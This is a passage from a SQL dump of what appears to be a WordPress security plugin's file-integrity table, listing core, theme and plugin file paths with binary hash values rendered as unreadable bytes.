?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),(':5U�=a��0���','wp-content/themes/magazine-hoot/hybrid/extend/includes/sanitization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�A�B�&�⩓.��T','��P#�w�q��s�`��Na��B\r��?1�','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{9�:=��q��aT��','Fb�EE��sn��>����+�o�F�<Zn�','',0,'?'),(':\\ܹ\r@���L\"�:�U','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eL�F��T�2Ѯ�He','M��D�\nR卸�X����=���j���н','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K;p�O�?F`h�w','�[��7�2��s���d`��������Mo','',0,'?'),(':�x��3�L&�3ſhD','wp-content/plugins/wp-cerber/assets/flags/mz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����v�)�Q�H�vz','�A�q#7����F�tˎ��Y�\\�j�ň�V:ܯ','',0,'?'),(':�%��(v5��q�0','wp-content/themes/twentytwentyone/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0ײ�O���\r�|��','��a�T��t����.t:��,�v��pڊ\0','',0,'?'),(':�˺�+���u��','wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5]��d��d�f�','��>��`������NN�`�N\"K�Ӟc�kG<;','',0,'?'),(':��\n9Ff*IG|�+�$','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/1_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FP�)��x�m���','C9\06�V�-�d߆-H��1�����K�F�','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#�	n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�Y\0�ys��<M','��-!V��>d�*jP�F�	�;QƵ��N1aG�(','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';C_�\n����c�K�','}y�Լ�A�lKnIJH�z&NVc���:[3�@n','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���J��ѡ��πi','���8C���P����/��g�e�TCW_��','',0,'?'),(';Rc��J���,�SA','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԯ�#��ɷ��D��','TH�d�����y��x?� �mP��}6�3V','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߣ0�SÂ���7~�:A','�ʼnO��V���%Y��UR�L��Tyh1\Z��G7','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';��:�6h����Z��','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j���ߙ3�*�)��� ','s*OZ#3�܃�h�	��X�唜x�Vр+��<','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' #j��2��\'5�!�gM','����϶.�X���po�I3���fY��cMʲ','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y�˖@%��','h66��b�����hS��=��J$���','',0,'?'),('<FѥY�Jw\"Of;S��','wp-includes/pomo/pomo/po.php',0,'�{K_��eG�@{	/','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<_-|�@iT�����','wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7UE\Z�,�`𫞈Ó~!','�X���Y�8���kcT��W<+���F2�i','',0,'?'),('<y\"v�0p��+\'���','wp-content/plugins/wp-cerber/assets/flags/pw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���k�	���e�','.�ڜ/��V���eR����x���P�i��_','',0,'?'),('<��]i�sx\n\\�#H','wp-content/themes/magazine-hoot/hybrid/extend/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V˂B���0h�EB�','&�cF�l��H:m��0��;9��2����_ˇm','',0,'?'),('<�!}K�A�,\r�y�2','wp-content/themes/twentytwentyone/template-parts/header/site-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�z*�-�9�v�Z,��','t���C�����a8f\r*���?�G�\r�G��-','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E.�)��\\�s	��\'','�G4:hu�\'�QN�=;F	״�EQ44��j','',0,'?'),('<��$�C�DO��#��','wp-content/plugins/wp-cerber/assets/flags/fj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���yZd=�\\l���r','C�����ȶ�]�*�s������l湘Jڀ�<e','',0,'?'),('<�hj�	�4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�]b�B�\\�l�j\rl','wp-content/themes/magazine-hoot/include/admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�*��05\\�>\'���','Y��(O�Bi�������ۆ�S�O�n�c�','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fRo�l�6��\"���]','�[Z�q�U�r�jM��?O�P��r��t�&','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y?��y*�iE��4}Z','c�����C�Ymd��,�R��p]����rh','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('=	]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\'mP��x5KbY.�','i�M�Q�����W\r���d�ɸ���','',0,'?'),('=@�}��g\r��Zx[<�','wp-content/themes/twentytwenty/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#f˭�Jlǿ�','I���l2�S���i.k�R�3�}��8V!<�','',0,'?'),('=A��3�����Zi�-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��sn1MQ(��f�','r����J6	Y;U���&��4=�5KQ�ia�','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��|?�M��=]J��','�4x��������!Gk˙���Lto�!��\'�#','',0,'?'),('=�.\'�I\'?��`��','wp-content/themes/magazine-hoot/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zg�4�͚\'l9hB;Q','�������؏y�.l8��g�r9�(\n{��02','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�h>��K3���u1','��ߋ�!�;n�^�u|ا�$Y0�56��4�','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�:7���]6hVo��','߫��/Lk����OT�bdS�EiL9���~8','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@J��x&H�*8�����.','2�j��!^g^i�r3�P~�\0�K8�c��\n�','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i8��X�3����cTD','�J���$_�F�$o�����{�fC�~L�3��<','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>v]�{rq�6x�','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��JkԌ`�M\"�r',';Ը�P��I��@?56�t���k�N�8@�=�4','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�RŖ���z`�T��','�	U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('>�\nq��g�/����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�X�y����gr\"3g','a�55�\Z�\\���7w{Լ^d�����TK�','',0,'?'),('>�M~��;Oo��-�I$0','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f!��<�\r����yS�','\"-d���NN6�3�P`��ʜ`!��ڬ	�q�','',0,'?'),('?�ke�zC��\"!�@�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B��	����IN�-y','��hl�[�������(�l~�Q�u�FM�	�','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?��1�E�ʄӲ���','wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�tl��\n!���Y8��','*��q|�	�l�<��\'��ԅ�|��L<���','',0,'?'),('?���Z���8.���G','wp-content/plugins/wp-cerber/assets/flags/ec.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�׏* �k&�(ʬjJ�','Bd=�Zj?r/{��\Z���7MF��\'��n-Zi��','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�l��m7��#��F','�z�d��q�ٻ�ٿ���	l���w�5�M�','',0,'?'),('?���C����!��Ӳ','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��*+��O}��g�','�/����h�f=@�0��5��H�0\r7t��m�8','',0,'?'),('?�cF	m��wI_��','wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*=i���ɱ����HR','����sk���Tˎč��u�|��Ќ���','',0,'?'),('@ a�Eq\"7g�Y�^c','wp-content/themes/magazine-hoot/include/admin/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����La\r�.f~�(','�ֈN�+��w�K��{L_�����;�% �?C','',0,'?'),('@ ��8�ɻ2��R9\Zs','wp-content/themes/magazine-hoot/include/admin/images/premium-header-top.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����)HB��yS','��,~+����xZpS���_�~iGp��cK','',0,'?'),('@!�a�ie�\\1}ݱ�z','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3s{_ƕ]��p�','���o;~]�b�^�R�<�l$�ә��1�6','',0,'?'),('@)�u��X�tȤ�0�','wp-content/plugins/wp-cerber/assets/flags/ng.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�mBC@�͚���','���H�!R�Ɂ=[�?aq�μYو�_hw��','',0,'?'),('@Fj���蝇��','wp-content/themes/magazine-hoot/hybrid/ext/cleaner-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'߂\n\\��@$�>��7','3�Y�T��	�u�d��Z\Z�:�v�%t���;�P','',0,'?'),('@G )�7x=��A��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"����i�qo��h	?�','ڴaWtĉ����q�)N��*x�*���q;T��0','',0,'?'),('@L<��m�^��c��Ic','wp-content/plugins/wp-cerber/assets/flags/bb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��(�zc�q','7!Ky�=�]b\neO-3{/Q��ȳ�Rҳ��L','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&�	�','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.Գ� <`�ϒ&�','V5��;����S6��,�Uft��Yn`A','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y`	���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R١��.�1&;�@','Y>]��B�A���u��5u�6�jT�6��d\rr+','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�����Lv��','v�����tQ�+4&f�d�1��Z�6LI�=�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�=���a�-�II','7G�V����ԉͦE<����x�Z)��:�%','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&��	��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(RroΡC\r�\n�F�+�','��ﴖ�ș*���t�Q��zWÆ�ײU','',0,'?'),('A:�gӝ�b��p\"j�','wp-content/themes/magazine-hoot/hybrid/extend/includes/enum.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���x\r�����.B�WT','�ݮ�Z�k{�����[�o�qef?�<e��	?','',0,'?'),('AfK/���U/=Q$r|','wp-content/themes/magazine-hoot/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$j~��bfD�k��b','�;Mt��DF\Z���wPt�#/����Wْ�E�','',0,'?'),('A���f�,��.��','wp-content/themes/magazine-hoot/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��S���ۨa�','��@lqe�ؿf����*-x��P�Q�*�:?O','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|}�\Zc�%��9j��','��b?/a#�׼�h�l��������\rk���','',0,'?'),('A ��	~׸TzM��\Zk','wp-content/themes/magazine-hoot/widget/social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��y*Y&���#�L�','�\\�A�k�\n��P�q��@x�6���m�Cܴ','',0,'?'),('A/hͳ$BQ��:����','wp-content/themes/twentynineteen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HP~�,Y��`sMu�k�0','��;�`� ��:�6�P��q�L�:*;��','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ	���[q��˜P���k�','',0,'?'),('AT�yxhl|�4+��n�','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4 vHhg�BL','됤oϙ�,/����ɞq�?����s��CvF�','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�r�[Ķ��i��k�','����=cA\"�-3�8��{t-�8 ��h�','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N -?�6�>��9�A͘','!�;#Q%BX\"GҵWM��>���a���T��37D','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�\\�ס\0�Ӹ���\Z�','؉(U�G�g�L��춗ږ\'GmD����','',0,'?'),('A�\\ݛ���-��7\Z�1','wp-content/plugins/wp-cerber/assets/flags/kh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\0B/\ro��5��;�','m~�~�����B���)��~����D?��ID','',0,'?'),('A���$h��՝`Q�a','wp-content/plugins/akismet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�� P�Z�ݢ`Ef','��}���5�e�3��3��mhyD�Q(','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B$�[\nfIZ&��[','wp-content/plugins/wp-cerber/assets/flags/na.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� B�z�z��Q�\"�','���5�������o�]�-� �)�Qb~��\0�','',0,'?'),('B-⍂��`ٗ��gt','wp-content/themes/magazine-hoot/include/admin/images/premium-typography.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ý���C̔ȴt|6�','y�n8�Y[�Q[��PX�%�Ҕ���q�\0��','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('BZg�l�,Ӗ�l��N','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-multi-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V/��3�J�&$ؕ��','N�b	�\Z	7���!���,�+6z�\0e���{','',0,'?'),('B_�-�Th�+`ä�R','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��N�x\\�\r�v/�','tG����ք��2�\ZF�]aY����Jb��p��','',0,'?'),('Bt�al��]���L�O�','wp-includes/pomo/pomo/mo.php',0,'!	/�\"۵�$=�iU�','!	/�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G^=�p�=$��\Z�2','�RK�6�����N\"3*\"�J�/0i�x0�','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq��	�Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���󚜆U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('C4��Ȝ��-�f�!-�','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=⎼��t�NR�','�@m�o��ܛMbrђ����$ �z�\r�2�K=','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	